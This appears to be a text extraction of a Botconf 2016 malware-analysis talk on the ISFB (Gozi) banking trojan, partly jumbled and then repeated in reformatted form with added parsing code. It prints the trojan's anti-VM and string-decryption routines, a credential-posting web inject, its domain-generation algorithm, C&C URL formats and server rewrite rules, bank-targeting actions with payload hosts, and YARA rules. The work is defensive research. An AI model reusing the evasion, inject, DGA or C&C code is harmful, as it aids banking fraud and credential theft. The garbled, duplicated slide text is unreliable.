‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 3: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 358

$ whois makMaciej Kotowicz

Principal Malware Researcher CERTplDragonSector CTFREExploit devAutomatization Formal methodsmaciekkotowicz

middotmiddotmiddotmiddotmiddot

358

02122016 ISFB

httpslokalhostpltalksbotconf20161 458

Disclaimer

Based on proposed plan author did some source codeanalysis and want to summarize his

Well Nope 75 of this came from Reverse Engineering

458

ISFB long story short

02122016 ISFB

httpslokalhostpltalksbotconf20161 558

ISFB long story short

Based on gozisame bugs going back to 2007UrsnifGoziGozi2RovnixVawtrakCasual history with rovnixFor us public appearence in 2014Now one of most puplar bankers on marketCouple of offsprings

middotmiddotmiddotmiddotmiddotmiddotmiddot

558

02122016 ISFB

httpslokalhostpltalksbotconf20161 658

ISFB

UrsnifGoziGozi2RovnixVawtrak

DbgPrint(ISFB_04x Installer DLL finished with status un GetCurrentProcessId() Status)C

ISFB project Version 213241 module dllc $Revision 265 $

658

02122016 ISFB

httpslokalhostpltalksbotconf20161 758

Scale

(n6 sinkhole connections in october - bankers only)

758

02122016 ISFB

httpslokalhostpltalksbotconf20161 858

Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]

858

02122016 ISFB

httpslokalhostpltalksbotconf20161 958

Scale

958

Scale

02122016 ISFB

httpslokalhostpltalksbotconf20161 1058

Scalekudos to Slavo (SWITCH-CERT)

1058

02122016 ISFB

httpslokalhostpltalksbotconf20161 1158

The Dropperor where the acients reside

02122016 ISFB

httpslokalhostpltalksbotconf20161 1258

Welcome to the system

achieve persistencyinject workersetup IPCnew download 2nd stage

middotmiddotmiddotmiddot

1258

02122016 ISFB

httpslokalhostpltalksbotconf20161 1358

Useless strings

1358

02122016 ISFB

httpslokalhostpltalksbotconf20161 1458

One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)

1458

Anti-VM

```c
/* mouse-movement check: decode_bss() is retried with the cursor delta as the
   key shift for as long as it reports a wrong checksum (12), so a sandbox
   that never moves the mouse never gets the strings decoded */
do {
    pci.cbSize = 20;
    GetCursorInfo(&pci);
    ret = decode_bss(pci.ptScreenPos.y - old_y - old_x + pci.ptScreenPos.x);
    old_x = pci.ptScreenPos.x;
    old_y = pci.ptScreenPos.x;   /* sic: y is saved from x */
} while (ret == 12);
```

Anti-VM

```c
/* reads SPDRP_FRIENDLYNAME (0xC) of the first enumerated device and looks for
   hypervisor vendor strings in it */
DeviceInfoData.cbSize = 28;
if ( SetupDiEnumDeviceInfo(v1, 0, &DeviceInfoData) )
{
    SetupDiGetDeviceRegistryPropertyA(v1, &DeviceInfoData, 0xCu, &Property, 0, 0, &PropertyBufferSize);
    if ( PropertyBufferSize )
    {
        v2 = (BYTE *)xHeapAlloc(PropertyBufferSize);
        v3 = (CHAR *)v2;
        if ( v2 )
        {
            if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSet, &DeviceInfoData, 0xCu, &Property, v2, PropertyBufferSize, &PropertyBufferSize)
              && (StrStrIA(v3, (LPCSTR)"vbox") || StrStrIA(v3, "qemu") || StrStrIA(v3, "vmware") || StrStrIA(v3, "virtual hd")) )
            {
                v0 = 1;   /* running under a hypervisor */
            }
            xHeapFree(v3);
        }
    }
}
```

String encryption

```c
signed int __stdcall decode_bss(int shift)
{
    /* ... v2 points to the section header of .bss */
    if ( !v2 )
        return 2;
    v6 = v2->VirtualAddress;
    if ( !v6 || !v2->SizeOfRawData )
        return 192;
    v7 = v2->SizeOfRawData;
    v8 = *(_DWORD *)"016";
    v9 = v13;
    /* key: low 5 bits of the shift plus build-date fragments XOR-ed with VA + size of .bss */
    v10 = (shift & 0x1F) + (*(_DWORD *)"29 2016" ^ *(_DWORD *)"Oct 29 2016" ^ (v7 + v6));
    XorDecryptBuffer(v7, (int)((char *)v13 + v6), v2->SizeOfRawData, v10);
    dword_4064EC = dword_40766E + dword_407662 + dword_407666;
    if ( dword_40766E + dword_407662 + dword_407666 != 0xEE553B4E )   /* check if correctly decoded */
    {
        /* wrong key: put the section back and report failure (12) to the caller */
        XorEncryptBuffer(dword_407662, (IMAGE_DOS_HEADER *)((char *)v9 + v2->VirtualAddress), v2->SizeOfRawData);
        v14 = 12;
    }
    /* ... */
}
```

Joined resources, or FJ-structs

```c
typedef struct {
    DWORD fj_magic;
    DWORD addr;
    DWORD size;
    DWORD crc32_name;
    DWORD flags;        /* OR-ed with 0x10000 means it is packed with aPLib */
} isfb_fj_elem;
```

Joined resources, or J1-structs

```c
typedef struct {
    DWORD j1_magic;
    DWORD flags;        /* can be aPLib packed */
    DWORD crc32_name;
    DWORD addr;
    DWORD size;
} isfb_j1_elem;
```

Known crc32_name values:

· 0x4F75CEA7, 0x9e154a0c: CRC_CLIENT32
· 0xD722AFCB, 0x8365B957, 0x8fb1dde1: CRC_CLIENT_INI
· 0xE1285E64: CRC_PUBLIC_KEY
· 0x90F8AAB4, 0x41982e1f: CRC_CLIENT64
· 0x7A042A8A: new, unknown
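An added example (not code from the talk) that walks a blob for joined-resource headers in both the FJ and the J1 layout above, names each entry by its crc32_name and flags aPLib-packed ones. The magic values are not on the slides, so `FJ_MAGIC`/`J1_MAGIC` are constructed placeholders (the ASCII tags read as little-endian DWORDs), and `addr` is treated as an offset into the blob for the constructed sample.

```python
import struct

# crc32_name -> role, copied from the slide's list
CRC_NAMES = {
    0x4F75CEA7: "CRC_CLIENT32",   0x9E154A0C: "CRC_CLIENT32",
    0xD722AFCB: "CRC_CLIENT_INI", 0x8365B957: "CRC_CLIENT_INI", 0x8FB1DDE1: "CRC_CLIENT_INI",
    0xE1285E64: "CRC_PUBLIC_KEY",
    0x90F8AAB4: "CRC_CLIENT64",   0x41982E1F: "CRC_CLIENT64",
    0x7A042A8A: "NEW",
}
APLIB_FLAG = 0x10000   # FJ slide: flags OR-ed with 0x10000 means aPLib packed

# Magic values are NOT on the slides: constructed placeholders, the ASCII tags
# "FJ" and "J1" read as little-endian DWORDs.
FJ_MAGIC = struct.unpack("<I", b"FJ\x00\x00")[0]
J1_MAGIC = struct.unpack("<I", b"J1\x00\x00")[0]

FJ_FMT = "<IIIII"   # fj_magic, addr, size, crc32_name, flags
J1_FMT = "<IIIII"   # j1_magic, flags, crc32_name, addr, size
ELEM_SIZE = struct.calcsize(FJ_FMT)   # 20 bytes for either layout


def parse_elem(buf, off):
    """Decode the element at buf[off:]; returns None when neither magic matches."""
    if off + ELEM_SIZE > len(buf):
        return None
    (magic,) = struct.unpack_from("<I", buf, off)
    if magic == FJ_MAGIC:
        _, addr, size, crc, flags = struct.unpack_from(FJ_FMT, buf, off)
        kind = "FJ"
    elif magic == J1_MAGIC:
        _, flags, crc, addr, size = struct.unpack_from(J1_FMT, buf, off)
        kind = "J1"
    else:
        return None
    return {
        "kind": kind, "offset": off, "addr": addr, "size": size,
        "crc32_name": crc, "name": CRC_NAMES.get(crc, "UNKNOWN"),
        "flags": flags,
        # the aPLib bit is documented for FJ; assumed to mean the same for J1
        "aplib": bool(flags & APLIB_FLAG),
    }


def scan_elems(buf, stride=4):
    """Return every FJ/J1 header found at a stride-aligned offset, in file order."""
    return [e for off in range(0, len(buf), stride)
            for e in [parse_elem(buf, off)] if e is not None]


def element_payload(buf, elem):
    """Slice the bytes an element describes (addr taken as an offset into buf,
    an assumption for this sample). aPLib-packed entries come back still packed."""
    if elem["addr"] + elem["size"] > len(buf):
        raise ValueError("%s element points outside the blob" % elem["name"])
    return buf[elem["addr"]:elem["addr"] + elem["size"]]


def build_sample():
    """Constructed blob: an aPLib-flagged FJ client.ini entry, then a J1 public-key entry."""
    ini = b"\x00ini-payload\x00"
    key = b"\x06\x02\x00\x00RSA1"
    hdrs = 2 * ELEM_SIZE
    fj = struct.pack(FJ_FMT, FJ_MAGIC, hdrs, len(ini), 0xD722AFCB, APLIB_FLAG | 0x3)
    j1 = struct.pack(J1_FMT, J1_MAGIC, 0, 0xE1285E64, hdrs + len(ini), len(key))
    return fj + j1 + ini + key
```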

Static configuration

```c
typedef struct {
    DWORD off;
    DWORD flags;
    QWORD value;
    QWORD uid;
} isfb_cfg_elem;

typedef struct {
    QWORD count;
    isfb_cfg_elem elems[count];
    char string_table[];
} isfb_static_cfg;      /* struct name not given on the slide */
```

Static cfg - fields

· 0x556aed8f - server
· 0xea9ea760 - bootstrap
· 0x656b798a - botnet
· 0x4fa8693e - key
· 0xd0665bf6, 0x75e6145c - domains
· 0xefc574ae - dga_seed
· 0x73177345 - dga_base_url
· 0xec99df2e - dga_tld
· 0xdf351e24 - tor32_dll
· 0x510f22d2 - tor_domains
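An added example (not the talk's tooling) that decodes a static configuration block laid out as on the slides (QWORD count, then isfb_cfg_elem entries, then a string table) and names each entry with the uid table above. Two assumptions are made: the crc32 of the field name sits in the low 32 bits of `uid`, and flags bit 0 marks entries whose `off` indexes the string table (otherwise `value` is a literal number).

```python
import struct

FIELD_NAMES = {   # uid -> field name, from the "Static cfg - fields" slide
    0x556AED8F: "server",   0xEA9EA760: "bootstrap",    0x656B798A: "botnet",
    0x4FA8693E: "key",      0xD0665BF6: "domains",      0x75E6145C: "domains",
    0xEFC574AE: "dga_seed", 0x73177345: "dga_base_url", 0xEC99DF2E: "dga_tld",
    0xDF351E24: "tor32_dll", 0x510F22D2: "tor_domains",
}
ELEM_FMT = "<IIQQ"                      # off, flags, value, uid (slide layout)
ELEM_SIZE = struct.calcsize(ELEM_FMT)   # 24
FLAG_STRING = 0x1   # assumption: set -> `off` indexes string_table, clear -> `value` is literal


def parse_static_cfg(blob):
    """Decode count, the element table and the string table; return {name: value}.
    Unknown uids are kept under 'uid_<hex>' so nothing in the block is silently dropped."""
    if len(blob) < 8:
        raise ValueError("block too short for the count field")
    (count,) = struct.unpack_from("<Q", blob, 0)
    table_start = 8 + count * ELEM_SIZE
    if table_start > len(blob):
        raise ValueError("element table runs past the end of the block")
    strings = blob[table_start:]
    cfg = {}
    for i in range(count):
        off, flags, value, uid = struct.unpack_from(ELEM_FMT, blob, 8 + i * ELEM_SIZE)
        uid32 = uid & 0xFFFFFFFF        # assumption: crc32 of the name in the low dword
        name = FIELD_NAMES.get(uid32, "uid_%08x" % uid32)
        if flags & FLAG_STRING:
            if off >= len(strings):
                raise ValueError("string offset out of range for %s" % name)
            end = strings.find(b"\x00", off)
            cfg[name] = strings[off:end if end >= 0 else len(strings)].decode("latin-1")
        else:
            cfg[name] = value
    return cfg


def build_sample():
    """Constructed block: a numeric botnet id, two strings and one unknown uid."""
    strings = bytearray(b"\x00")   # offset 0 stays an empty string

    def add(text):
        off = len(strings)
        strings.extend(text.encode("ascii") + b"\x00")
        return off

    elems = [
        (0, 0, 1000, 0x656B798A),                                         # botnet = 1000
        (add("12"), FLAG_STRING, 0, 0x556AED8F),                          # server = "12"
        (add("example-c2.invalid/images/"), FLAG_STRING, 0, 0xD0665BF6),  # domains (constructed)
        (0, 0, 0x1234, 0xDEADBEEF),                                       # unknown uid, numeric
    ]
    blob = struct.pack("<Q", len(elems))
    for elem in elems:
        blob += struct.pack(ELEM_FMT, *elem)
    return blob + bytes(strings)
```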

Static cfg

Man in the Browser, or where my money goes

Dynamic config

```c
typedef struct {
    DWORD size;
    BYTE  data[size];
} inject_elem;

typedef struct {
    inject_elem target;      /* url glob */
    inject_elem action;      /* or regex */
    inject_elem params[4];   /* other params */
} inject_chunk;

typedef inject_chunk injects_t[];
```

Web Injects

```javascript
(function () {
    var bn = "US_" + "BOFA_1";
    var bot_id = "ID_" + bn;
    var sa = decode64();   // argument not shown on the slide
    var req = "send=0&u_bot_id=" + bot_id + "&bn=" + bn + "&page=8&u_login=&u_pass=&log=" + get_me_core;
    sendScriptRequest(sa, req, function statusCall1() {
        var element = document.getElementById("loader");
        element.parentNode.removeChild(element);
    });
})();
```

Web Actions

· FILE
· SCREENSHOT
· HIDDEN
· NEW
· GRAB
· VIDEO
· PROCESS
· POST
· VNC

Web Actions (example REDIRECT, FILE and VNC actions from a live configuration)

The Bot

Registry Keys

Software\AppDataLow\Software\Microsoft\[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}

· Install
· Client
· NetCfg
· LastTask
· LastConfig

Other Actions

· GET_CERTS
· GET_COOKIES
· GET_SYSINFO
· LOAD_EXE
· GET_FILES
· SOCKS_START
· GET_KEYLOG
· GET_MAIL
· GET_FTP
· VNC_START
· URL_BLOCK

Calling Home

ET phone home

· Static domains inside configuration files
· DGA based on template and current date
· C&C hidden in TOR network
· P2P network

DGA

```python
# excerpt of the DGA routine: LsaRandom and the word list `words` are defined elsewhere
rnd = LsaRandom()
rnd.seed = (((kwargs['seed'] << 16) & 0xffffffff) + kwargs['season'] + kwargs['lsa_seed']) & 0xffffffff
# second seeding variant shown on the slide; this assignment is the one in effect
rnd.seed = (1 << 16) + kwargs['season'] - 0x124676D0
r = []
for i in range(kwargs['count']):
    suf = kwargs['tld'][(rnd.rnd() >> 1) % len(kwargs['tld'])]   # rnd.choose(kwargs['tld'])
    dom_l = rnd.rnd() % self.DGA_MIN_LEN + self.DGA_MIN_LEN
    wc = 0
    dom = []
    while wc < dom_l:
        d = rnd.choose(words)
        ws = len(d)
        if not rnd.rnd() % 3:
            ws -= 2
        if wc + ws > self.DGA_MAX_LEN:
            continue
        dom.append(d[:ws])
        wc += ws
    r.append(''.join(dom) + suf)
```

TOR

P2P

```c
typedef struct {
    DWORD magic;              /* 0x395f2ec1 */
    DWORD my_secret;
    DWORD his_secret;
    BYTE  cmd0;
    BYTE  cmd1;
    BYTE  data[];
} isfb_p2p_inner_packet;

typedef struct {
    BYTE  flags;
    DWORD salt;               /* 4 random higher bytes of keys */
    isfb_p2p_inner_packet p;  /* encrypted */
} isfb_p2p_packet;
```

Internet is Hard

URL format

```
https://%s/%s?user%5fid=%4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x
```

```
/tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY

oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f

cnc.tld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg

t[RAND][RAND]=data
```

URL format

```python
import re
import pprint

# Python 2 snippet: decrypt() and the key SKEY come from the analysis tooling
decode_req = lambda d: decrypt(d.decode('base64'), SKEY)
# undo the "_XX" escaping of '+' and '/' and restore base64 padding
d = re.sub('_([0-9A-Fa-f]{2})', lambda x: chr(int(x.group(1), 16)), d)
try:
    e = d.decode('base64')
except Exception as e:
    d = d + '=='
pprint.pprint(dict(map(lambda x: x.split('='), decode_req(d).strip('\x00').split('&'))))
```

```
{'crc': '7001380',
 'id': '1065',
 'ppc': 'xi',
 'server': '12',
 'soft': '1',
 'user': '0c0d784a0cf755970edbdf4c0cb27fca',
 'version': '214887'}
```

URL format

```
t.php          get new task             used until Sep 2015
c.php          get new config           used until Sep 2015
d.php          send stolen data         used until Sep 2015
images/*.gif   get new task             current format
images/*.jpeg  get new config           current format
images/*.bmp   send stolen data         current format
images/*.avi   download 2nd stage dll   not every C&C
```
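An added example (not the talk's decode_req) that classifies a beacon URL by the path table above and undoes the transport encoding of the query blob: "_XX" escapes back to characters, base64 padding restored, NUL padding stripped, key=value pairs split on "&". The talk's decode_req runs decrypt(..., SKEY) between base64 and the split; here `decrypt` is a pluggable hook that defaults to identity, so the constructed, unencrypted sample runs offline. Taking the blob from the path between "images/" and the extension is an assumption about the images form.

```python
import base64
import re

# path -> purpose, from the "URL format" table on the slide
PATH_KINDS = [
    (re.compile(r"/t[^/]*\.php$"),     "task (format used until Sep 2015)"),
    (re.compile(r"/c[^/]*\.php$"),     "config (format used until Sep 2015)"),
    (re.compile(r"/d[^/]*\.php$"),     "data (format used until Sep 2015)"),
    (re.compile(r"/images/.*\.gif$"),  "task"),
    (re.compile(r"/images/.*\.jpeg$"), "config"),
    (re.compile(r"/images/.*\.bmp$"),  "data"),
    (re.compile(r"/images/.*\.avi$"),  "2nd stage dll"),
]


def classify(url):
    """Name the request by its path alone; host and query string are ignored."""
    path = re.sub(r"^https?://[^/]*", "", url.split("?", 1)[0])
    for rx, kind in PATH_KINDS:
        if rx.search(path):
            return kind
    return "unknown"


def extract_blob(url):
    """Pull the encoded payload out of either form: the first query value for the
    *.php form, or (assumption) the path between 'images/' and the extension for
    the images form, with any '/' separators removed."""
    if "?" in url:
        return url.split("?", 1)[1].split("&", 1)[0].split("=", 1)[-1]
    m = re.search(r"/images/(.+)\.[a-z]+$", url)
    return m.group(1).replace("/", "") if m else ""


def unescape_blob(blob):
    """Undo the URL-safe encoding seen on the slide ('_2B' -> '+', '_2F' -> '/')
    and restore the base64 padding the bot strips."""
    blob = re.sub(r"_([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), blob)
    return blob + "=" * (-len(blob) % 4)


def decode_fields(blob, decrypt=lambda raw: raw):
    """base64 -> decrypt hook -> strip NUL padding -> dict of key=value pairs.
    `decrypt` stands in for the talk's decrypt(..., SKEY); identity by default."""
    raw = decrypt(base64.b64decode(unescape_blob(blob)))
    text = raw.rstrip(b"\x00").decode("latin-1")
    return dict(kv.split("=", 1) for kv in text.split("&") if "=" in kv)


def parse_beacon(url, decrypt=lambda raw: raw):
    return {"kind": classify(url), "fields": decode_fields(extract_blob(url), decrypt)}


def build_sample_url():
    """Constructed beacon: field values are those of the decoded request on the
    slide, but the blob is left unencrypted so the example runs offline."""
    fields = (b"soft=1&version=214887&user=0c0d784a0cf755970edbdf4c0cb27fca"
              b"&server=12&id=1065&crc=7001380")
    b64 = base64.b64encode(fields + b"\x00\x00").decode("ascii").rstrip("=")
    b64 = b64.replace("+", "_2B").replace("/", "_2F")
    return "http://c2.example.invalid/images/" + b64 + ".jpeg"
```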

C&C response

Wiki

Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham and Lars Knudsen.

